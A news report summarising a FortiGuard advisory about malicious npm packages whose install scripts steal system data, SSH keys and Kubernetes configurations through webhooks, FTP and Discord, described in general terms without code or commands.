A series of malicious packages hidden within the Node Package Manager (npm), the largest software registry for JavaScript, has been uncovered.
According to a new advisory published by FortiGuard on Monday, the discoveries come as a result of a dedicated system aimed at identifying malicious open-source packages across various ecosystems, including npm and PyPI. These packages have been found to employ deceptive install scripts that execute both pre and post-installation.
FortiGuard security researchers Jin Lee and Jenna Wang explained that the primary objective of these malicious packages is to pilfer sensitive data, including system and user information, through the use of webhooks or file-sharing links. These packages can be categorized into nine sets based on their code and functions.
The first set includes packages that, while obfuscated, exfiltrate sensitive data such as Kubernetes configurations, SSH keys, system fingerprinting details and more.
The second set consists of packages that send HTTP GET requests to specific URLs, scanning for sensitive files and directories containing valuable intellectual property and configuration data, which is then extracted and uploaded to an FTP server.
Subsequent sets follow a similar pattern, using install scripts to steal sensitive data through Discord webhooks, with variations in coding style and execution methods.
The research findings underscore the need for caution among npm users when installing packages. It's crucial to remain vigilant against suspicious install scripts, as these can potentially compromise sensitive information.
"End users should watch for packages that employ suspicious install scripts and exercise caution," reads the technical write-up. "We will continue hunting for and reporting malicious packages to help users avoid becoming victims."
The original advisory from FortiGuard Labs includes more information about these malicious npm packages and access to Indicators of Compromise (IOCs) related to them.